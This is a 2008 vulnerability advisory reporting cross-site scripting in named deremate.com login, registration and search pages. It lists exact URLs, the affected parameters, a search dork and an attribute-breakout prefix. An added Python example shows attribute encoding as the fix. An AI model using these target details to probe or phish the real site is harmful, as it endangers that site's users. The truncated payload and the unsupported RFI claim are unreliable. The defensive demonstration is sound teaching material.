[ www.nullcode.com.ar ]

+==========================================================================+
+           Deremate.com security compromised with XSS/ RFI flaw           +
+==========================================================================+

Author(s): Ivan Sanchez
Product: deremate.com
Web: http://www.deremate.com/
Versions, sites affected: Copyright © 1999-2006 DeRemate.com
Date: 24/08/2008

Sites on the Deremate domain are affected by an XSS / RFI flaw that allows phishing and other compromises...

GOOGLE DORKS:
------------
"deremate.com"

Domains affected, part I:
------------------------
http://afiliados.deremate.com.ar/login.asp
http://afiliados.deremate.com.ar/registro/registro-particular-t1.asp
http://afiliados.deremate.com.ar/registro/registro-empresa-t1.asp
(there are other vulnerable links)

Parameters affected:
--------------------
txtIDUsuario
txtContrasena

Evil code to input into parameter:
">

Domain affected, part II:
-------------------------
http://www.deremate.com.ar/cafe/runSearch.asp
(there are other vulnerable links)

Parameters affected:
--------------------
toSearch

Evil code to input into parameter:
">

Remediation:
------------
Review and then sanitize all internal code.

NULL CODE SERVICES
[ www.nullcode.com.ar ]
Hunting Security Bugs!
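The `">` prefix listed above works because the submitted parameter is echoed back inside an HTML attribute, so the double quote closes the attribute and the `>` closes the tag. The following added example is not part of the advisory and is not deremate.com's code: the form template standing in for runSearch.asp and the inert `probe` canary tag are constructed. It renders the form both unencoded (as reported) and attribute-encoded (the remediation), and includes a check that flags any tag the template never emitted.

```python
import html
from html.parser import HTMLParser

# Constructed stand-in for the search form; the real runSearch.asp markup
# is not in the advisory.
FORM_TEMPLATE = ('<form action="runSearch.asp">'
                 '<input name="toSearch" value="{value}"></form>')
EXPECTED_TAGS = {"form", "input"}
# The advisory's breakout prefix followed by a constructed, inert tag name.
PROBE = '"><probe>'


def render_vulnerable(param):
    """Echoes the parameter verbatim into the attribute, as the reported pages did."""
    return FORM_TEMPLATE.format(value=param)


def render_hardened(param):
    """Encodes for the attribute context: " < > & become entities, so the value
    can no longer terminate value="..." (Server.HTMLEncode does this in classic ASP)."""
    return FORM_TEMPLATE.format(value=html.escape(param, quote=True))


class _FormInspector(HTMLParser):
    """Collects every start tag and the decoded value of the toSearch input."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.search_value = None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        attrs = dict(attrs)
        if tag == "input" and attrs.get("name") == "toSearch":
            self.search_value = attrs.get("value")


def inspect(rendered):
    parser = _FormInspector()
    parser.feed(rendered)
    parser.close()
    return parser


def injected_tags(rendered):
    """Tags in the response that the template never emits: a reflected
    parameter has broken out of its attribute and started new markup."""
    return [t for t in inspect(rendered).tags if t not in EXPECTED_TAGS]


def reflected_value(rendered):
    """What the browser would actually place in the search box after decoding."""
    return inspect(rendered).search_value
```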